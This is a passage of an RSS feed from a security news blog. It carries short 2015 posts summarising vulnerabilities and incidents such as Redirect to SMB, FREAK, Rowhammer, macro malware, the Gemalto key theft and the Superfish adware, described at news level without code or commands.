          
            
              <category>Vulnerability</category>
            
          
        
        
          
            
              <category>2015</category>
            
          
        
        
          
            
              <category>Looking back</category>
            
          
        
      </item>
      
      <item>
        <title>Looking back at April 2015</title>
        <link>https://untrustednetwork.net/en/2015/05/09/looking-back-at-april-2015/</link>
        <pubDate>Sat, 09 May 2015 20:51:28 +0100</pubDate>
        
        <atom:modified>Sat, 09 May 2015 20:51:28 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2015/05/09/looking-back-at-april-2015/</guid>
        <description>During April, we have witnessed - among others - a discovery of an 18 years old &amp;ldquo;Redirect to SMB&amp;rdquo; vulnerability which can be used to attack all versions of Windows released since then. The vulnerability can be exploited in cases when attacker has some control over the network, enabling him to gain user login information by redirecting of network traffic to a malicious SMB (server message block) server. The server forces the target to automatic authorization process during which the target sends users login, domain and hashed password.</description>
        <content:encoded>&lt;p&gt;During April, we have witnessed - among others - a discovery of an 18 years old &lt;a href=&#34;https://autoblog.postblue.info/autoblogs/lamaredugoffrblog_a1de86d064e376dc283723997fd86bde6ba2d492/media/44593e6c.RedirectToSMB_public_whitepaper.pdf&#34;&gt;&amp;ldquo;Redirect to SMB&amp;rdquo;&lt;/a&gt; vulnerability which can be used to attack all versions of Windows released since then. The vulnerability can be exploited in cases when attacker has some control over the network, enabling him to gain user login information by redirecting of network traffic to a malicious SMB (server message block) server. The server forces the target to automatic authorization process during which the target sends users login, domain and hashed password.&lt;br /&gt;
Next to this vulnerability an April &lt;a href=&#34;https://blog.trendmicro.com/trendlabs-security-intelligence/enterprises-hit-by-bartalex-macro-malware-in-recent-spam-outbreak/&#34;&gt;discovery of a modern macro malware BALTEX&lt;/a&gt;. It spreads using phishing messages with a link to a page containing an infected Word document and instructions to enable macros. After the downloaded document is opened, the macro downloads a variant of DYRE banking malware.&lt;br /&gt;
It is also worth mentioning that the &lt;a href=&#34;http://www.rsaconference.com/&#34;&gt;RSA conference&lt;/a&gt; was held at the end of April.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>Microsoft</category>
            
          
            
              <category>Windows</category>
            
          
            
              <category>Malware</category>
            
          
            
              <category>RSA</category>
            
          
        
        
          
            
              <category>2015</category>
            
          
        
        
          
            
              <category>Looking back</category>
            
          
        
      </item>
      
      <item>
        <title>Looking back at March 2015</title>
        <link>https://untrustednetwork.net/en/2015/04/01/looking-back-at-march-2015/</link>
        <pubDate>Wed, 01 Apr 2015 00:00:24 +0100</pubDate>
        
        <atom:modified>Wed, 01 Apr 2015 00:00:24 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2015/04/01/looking-back-at-march-2015/</guid>
        <description>Looking back at March, probably the most important information security news has been discovery of a significant vulnerability (which could be exploited using a FREAK attack) in some TLS/SSL implementations, including the ones used by Windows operating systems.
Another worth while news has been a discovery of a new campaign aimed at energy sector companies in the Middle East. Trojan Laizok - a reconnaissance malware for gathering information about infected systems - has been used in the campaign, along with other malicious programs which have been modified for specific systems based on the information gathered by Laizok.</description>
        <content:encoded>&lt;p&gt;Looking back at March, probably the most important information security news has been &lt;a href=&#34;https://www.untrustednetwork.net/en/2015/03/04/freak-a-high-impact-vulnerability-in-tls-ssl/&#34;&gt;discovery&lt;/a&gt; of a significant vulnerability (which could be exploited using a FREAK attack) in some TLS/SSL implementations, including the ones used by Windows operating systems.&lt;br /&gt;
Another worth while news has been a discovery of a new campaign aimed at energy sector companies in the Middle East. Trojan Laizok - a reconnaissance malware for gathering information about infected systems - has been used in the campaign, along with other malicious programs which have been modified for specific systems based on the information gathered by Laizok.&lt;br /&gt;
A mention should also be made about two very powerful DDoS attacks made during the second half of the month - first one was targeted at Greatfire.org and the second one at GitHub. According to &lt;a href=&#34;http://www.tripwire.com/state-of-security/latest-security-news/github-hit-with-massive-ddos-attack-china-allegedly-involved/&#34;&gt;published analysis&lt;/a&gt; China was the source of both attacks.&lt;br /&gt;
Finally, at the end of &amp;ldquo;Looking back&amp;rdquo; we shoud mention that in course of March the &lt;a href=&#34;https://www.untrustednetwork.net/en/2015/03/10/rowhammer-an-attack-which-uses-a-weakness-in-ddr3-memory/&#34;&gt;Rowhammer&lt;/a&gt; attack was made public. It is based on changing specific bits in memory by exploiting a weakness in DDR3 memories which leads to priviledge escalation.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>Microsoft</category>
            
          
            
              <category>Rowhammer</category>
            
          
            
              <category>Windows</category>
            
          
            
              <category>Malware</category>
            
          
        
        
          
            
              <category>2015</category>
            
          
        
        
          
            
              <category>Looking back</category>
            
          
        
      </item>
      
      <item>
        <title>Rowhammer - an attack which uses a weakness in DDR3 memory</title>
        <link>https://untrustednetwork.net/en/2015/03/10/rowhammer-an-attack-which-uses-a-weakness-in-ddr3-memory/</link>
        <pubDate>Tue, 10 Mar 2015 13:57:46 +0100</pubDate>
        
        <atom:modified>Tue, 10 Mar 2015 13:57:46 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2015/03/10/rowhammer-an-attack-which-uses-a-weakness-in-ddr3-memory/</guid>
        <description>Researchers from Google&amp;rsquo;s Project Zero have released information about a new attack based on flipping bits in DDR3 memory. The attack uses approach called Rowhammer which was devised last year by a team from Carnegie Mellon University and Intel Labs. It is based on repeated writing to and reading from a part of memory in a very short time which causes flipping values of bits in adjacent memory (the flipping is made possible by interaction between adjacent memory cells caused by their close proximity).</description>
        <content:encoded>&lt;p&gt;Researchers from Google&amp;rsquo;s Project Zero have released &lt;a href=&#34;http://googleprojectzero.blogspot.cz/2015/03/exploiting-dram-rowhammer-bug-to-gain.html&#34;&gt;information&lt;/a&gt; about a new attack based on flipping bits in DDR3 memory. The attack uses approach called Rowhammer which was &lt;a href=&#34;http://users.ece.cmu.edu/~yoonguk/papers/kim-isca14.pdf&#34;&gt;devised&lt;/a&gt; last year by a team from Carnegie Mellon University and Intel Labs. It is based on repeated writing to and reading from a part of memory in a very short time which causes flipping values of bits in adjacent memory (the flipping is made possible by interaction between adjacent memory cells caused by their close proximity).&lt;br /&gt;
Using the described principle, researchers from Project Zero created two exploits which they used to successfully elevate user privileges on a x86-64 Linux system where they achieved unrestricted access to the entire physical memory by flipping bits in page table entries (PTEs). In their announcement, they reported that the described approach was successfully used on machines with DDR3 memory without ECC (error correcting code). Flipping of bits has not been seen on machines with ECC memories. Source codes for the test program used to determine if a machine is vulnerable to Rowhammering have been released by the authors and may be found &lt;a href=&#34;https://github.com/google/rowhammer-test&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>Rowhammer</category>
            
          
            
              <category>Vulnerability</category>
            
          
            
              <category>Project Zero</category>
            
          
            
              <category>Linux</category>
            
          
            
              <category>Hardware</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2015</category>
            
          
        
        
      </item>
      
      <item>
        <title>FREAK - a high impact vulnerability in TLS/SSL</title>
        <link>https://untrustednetwork.net/en/2015/03/04/freak-a-high-impact-vulnerability-in-tls/ssl/</link>
        <pubDate>Wed, 04 Mar 2015 10:06:49 +0100</pubDate>
        
        <atom:modified>Wed, 04 Mar 2015 10:06:49 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2015/03/04/freak-a-high-impact-vulnerability-in-tls/ssl/</guid>
        <description>An international research team has devised attack called FREAK (Factoring attack on RSA Export Keys) with which it is possible to lower the level of encryption used in SSL connections. Attack is based on forcing server and client to use legacy (the vulnerability has been present for a long time) weak cryptographic suites which are still supported by some of the mainstream browsers (Safari and OpenSSL-based Android browser among others) and servers.</description>
        <content:encoded>&lt;p&gt;An international research team has devised attack called &lt;a href=&#34;https://www.smacktls.com/#freak&#34;&gt;FREAK&lt;/a&gt; (Factoring attack on RSA Export Keys) with which it is possible to lower the level of encryption used in SSL connections. Attack is based on forcing server and client to use legacy (the vulnerability has been present for a long time) weak cryptographic suites which are still supported by some of the mainstream browsers (Safari and OpenSSL-based Android browser among others) and servers. After a key has been factored a man-in-the-middle attack may be launched by attacker against encrypted connection between a server and a browser. The aformentioned legacy cryptographic suites have been added to SSL implementations at a time when export regulations for cryptographic material were in effect in USA and only specific (weak) cryptographic suites were legally allowed to be exported. A link to a page containing further information about potentially vulnerable sites and a test for vulnerability on the client side may be found &lt;a href=&#34;https://freakattack.com/&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>TLS/SSL</category>
            
          
            
              <category>Cryptography</category>
            
          
            
              <category>Vulnerability</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2015</category>
            
          
        
        
      </item>
      
      <item>
        <title>Looking back at February 2015</title>
        <link>https://untrustednetwork.net/en/2015/03/03/looking-back-at-february-2015/</link>
        <pubDate>Tue, 03 Mar 2015 09:58:57 +0100</pubDate>
        
        <atom:modified>Tue, 03 Mar 2015 09:58:57 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2015/03/03/looking-back-at-february-2015/</guid>
        <description>Dramatic information security incidents and news were unfortunately fairly common in February – we will shortly remember three of the most interesting ones.
Most attention was probably gained by a story about an alleged theft of massive amount of encryption keys used in mobile communication from the network of Dutch company Gemalto (a major SIM card supplier) by NSA and GCHQ. The keys could be used to decrypt live communication and also, for example, remotely inject malicious code into end devices.</description>
        <content:encoded>&lt;p&gt;Dramatic information security incidents and news were unfortunately fairly common in February – we will shortly remember three of the most interesting ones.&lt;/p&gt;
&lt;p&gt;Most attention was probably gained by a story about an alleged theft of massive amount of encryption keys used in mobile communication from the network of Dutch company Gemalto (a major SIM card supplier) by NSA and GCHQ. The keys could be used to decrypt live communication and also, for example, remotely inject malicious code into end devices. Source of the story has been The Intercept, citing a &lt;a href=&#34;https://firstlook.org/theintercept/document/2015/02/19/cne-access-core-mobile-networks-2/&#34;&gt;document&lt;/a&gt; from 2010 which was acquired by Edward Snowden, formerly from the NSA. After the news went public Gemalto stock took a &lt;a href=&#34;http://www.theregister.co.uk/2015/02/20/gemalto_sim_surveillance_fallout/&#34;&gt;serious hit&lt;/a&gt;. The company responded couple of days later by a &lt;a href=&#34;http://www.gemalto.com/press/Pages/Gemalto-presents-the-findings-of-its-investigations-into-the-alleged-hacking-of-SIM-card-encryption-keys.aspx&#34;&gt;press release&lt;/a&gt; admitting that operation by NSA and GCHQ resulting in penetration of internal company network probably happened, but emphasizing that the penetration “could not have led to a massive theft of encryption keys”. Gemalto further stated that “in the case of eventual key theft, the intelligence services would only be able to spy on second generation 2G mobile network” since “3G and 4G networks are not vulnerable to this type of attack”.&lt;/p&gt;
&lt;p&gt;Another high impact February news has been that the Superfish adware (which is used to inject ads into viewed web pages based on analysis of viewed pictures) which Lenovo used to &lt;a href=&#34;http://www.theregister.co.uk/2015/02/19/superfish_lenovo_spyware/&#34;&gt;preinstall&lt;/a&gt; on their laptops installed a self-signed root certificate. Using that, the adware could generate certificates for web pages which user viewed using encrypted connections, replacing the legitimate certificates and compromising security of communication between the user and the web page. Superfish was then able to analyze and alter the SSL encrypted communication. Furthermore, since the root certificated seems to have been always the same and itself &lt;a href=&#34;http://www.tripwire.com/state-of-security/security-data-protection/superfish-lenovo-adware-faq/&#34;&gt;not very secure&lt;/a&gt;, its presence in a system constitutes a vulnerability which can be used quite easily by a potential attacker. Since discovering this, &lt;a href=&#34;http://www.cnet.com/news/lenovo-hit-by-lawsuit-over-superfish-adware/&#34;&gt;lawsuits&lt;/a&gt; have been filed against Lenovo and web pages of the company have been &lt;a href=&#34;http://www.v3.co.uk/v3-uk/news/2397144/lizard-squad-hackers-attack-lenovo-after-superfish-scandal&#34;&gt;defaced&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;It should also be noted that in the course of February, after being criticized by Microsoft (among others), Google decided to &lt;a href=&#34;http://www.infosecurity-magazine.com/news/google-blinks-first-with-project/&#34;&gt;change&lt;/a&gt; the policy of its Project Zero – an initiative which, after a vulnerability has been discovered in an application, gave 90-day deadline to its developers to work on a patch. After the deadline has passed the vulnerability was made public regardless of existence of a patch or its planed later release. This has been the case for Microsoft and a vulnerability in Windows 8.1 when the 90-day deadline ended &lt;a href=&#34;http://blogs.technet.com/b/msrc/archive/2015/01/11/a-call-for-better-coordinated-vulnerability-disclosure.aspx&#34;&gt;two days&lt;/a&gt; before planned release of a patch during Patch Tuesday, regular release of updates and patches by Microsoft. Google now grants developers up to 2 weeks reprieve after the deadline has passed, provided they are actively working on patching the vulnerability.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>Gemalto</category>
            
          
            
              <category>NSA</category>
            
          
            
              <category>GCHQ</category>
            
          
            
              <category>Snowden</category>
            
          
            
              <category>Lenovo</category>
            
          
            
              <category>Adware</category>
            
          
            
              <category>Google</category>
            
          
            
              <category>Microsoft</category>
            
          
            
              <category>Project Zero</category>
            
          
        
        
          
            
              <category>2015</category>
            
          
        
        
          
            
              <category>Looking back</category>
            
          
        
      </item>
      

    
  </channel>
</rss>